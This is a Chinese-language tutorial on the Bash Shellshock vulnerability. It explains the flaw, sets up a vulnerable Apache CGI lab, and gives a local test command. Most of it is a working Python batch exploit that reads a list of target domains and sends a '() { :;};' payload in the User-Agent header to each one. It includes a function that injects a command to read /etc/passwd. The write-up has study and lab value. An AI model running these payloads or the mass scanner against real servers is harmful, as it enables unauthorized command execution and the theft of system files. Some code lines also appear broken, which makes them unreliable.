0x01 漏洞原理
Bash使用的环境变量是通过函数名称来调用的,导致漏洞出问题是以“(){”开头定义的环境变量在命令ENV中解析成函数后,Bash执行并未退出,而是继续解析并执行shell命令。而其核心的原因在于在输入的过滤中没有严格限制边界,也没有做出合法化的参数判断。
0x2 Bash破壳漏洞测试
2.1 本地测试语句:
$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
输出:
vulnerable
this is a test
说明有漏洞,否则就没有。
2.2 漏洞复现:
2.2.1 安装配置:
- Centos6 Apache2.2 CGI
yum install httpd
service iptables stop
httpd.conf配置
1、576行设置/var/www/cgi-bin目录的脚本别名是cgi-bin,
ScriptAlias /cgi-bin/ "/var/www/cgi-bin/"
让这个目录下都支持cgi
2、582行修改Options
<Directory "/var/www/cgi-bin">
AllowOverride None
Options ExecCGI
Order allow,deny
Allow from all
</Directory>
3、796行添加访问后缀,当其被访问能被解析
AddHandler cgi-script .cgi .pl .sh
4、200行需要有cgi模块
LoadModule cgi_module modules/mod_cgi.so
POC.cgi放置到cgi-bin,具体内容如下:
#!/bin/bash
echo "Content-type: text/html"
echo ""
echo '<html>'
echo '<head>'
echo '<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">'
echo '<title>PoC</title>'
echo '</head>'
echo '<body>'
echo '<pre>'
/usr/bin/env
echo '</pre>'
echo '</body>'
echo '</html>'
2.2.1 Bash配置:
下载Bash之后,因为apache默认调用的是/bin/bash,没有漏洞。所以要通过软链接调用存在漏洞的Bash
$ wget http://labfile.oss.aliyuncs.com/bash-4.1.tar.gz
$ tar xf bash-4.1.tar.gz
$ cd bash-4.1
$ ./configure
$ make & make install
$ ln -s /usr/local/bin/bash /bin/bash
2.2 批量测试
# -*- coding:utf8 -*-
import urllib.parse
import urllib.request
import ssl
import re
import sys
from socket import timeout
import http.client #修改引用的模块
import os
domain_list = []
result = []
#读取文件函数
def read_file(file_path):
# 判断文件路径是否存在,如果不存在直接退出,否则读取文件内容
if not os.path.exists(file_path):
print('Please confirm correct filepath ! ')
sys.exit(0)
else:
with open(file_path, 'r') as source:
for line in source:
domain_list.append(line.rstrip('
').rstrip('
'))
def bash_exp(url):
hostname, urlpath = urllib.parse.urlsplit(url)[1:3]
try:
conn = http.client.HTTPConnection(hostname, timeout=20)
headers = {"User-Agent": '() { :;}; echo vulnerable /bin/bash -c "echo this is a test"'}
conn.request("GET", urlpath, headers=headers)
res = conn.getresponse()
if res and res.status == 500:
print("{host} : discover Vulnerable! ".format(host=hostname))
result.append(hostname)
else:
print("{host} :No Bash Vulnerable! ".format(host=hostname))
#except Exception, e:
except Exception as e:
print("{host} is {err}".format(host=hostname,err=e))
def cat_passwd(hostname, urlpath):
print("cat /etc/passwd :")
conn3 = http.client.HTTPConnection(hostname, timeout=20)
headers3 = {"User-Agent": "() { :;}; echo `/bin/cat /etc/passwd`"}
conn3.request("GET", urlpath, headers=headers3)
res3 = conn3.getresponse()
res = res3.getheaders()
for passwdstr in res:
print(passwdstr[0] + ':' + passwdstr[1])
if __name__ == '__main__':
read_file(os.getcwd()+"//attck.txt")
for domain in domain_list:
test_url = ("http://{domain}/cgi-mod/index.cgi").format(domain=domain)
bash_exp(test_url)
for ret in result:
with open("result.txt","a+") as file:
file.write(ret)
2.3 参考
https://www.linode.com/docs/web-servers/apache/run-php-cgi-apache-centos-6/
https://www.freebuf.com/news/48331.html
https://blog.csdn.net/yaofeino1/article/details/55211993
https://www.cyberciti.biz/faq/how-do-i-check-my-bash-version/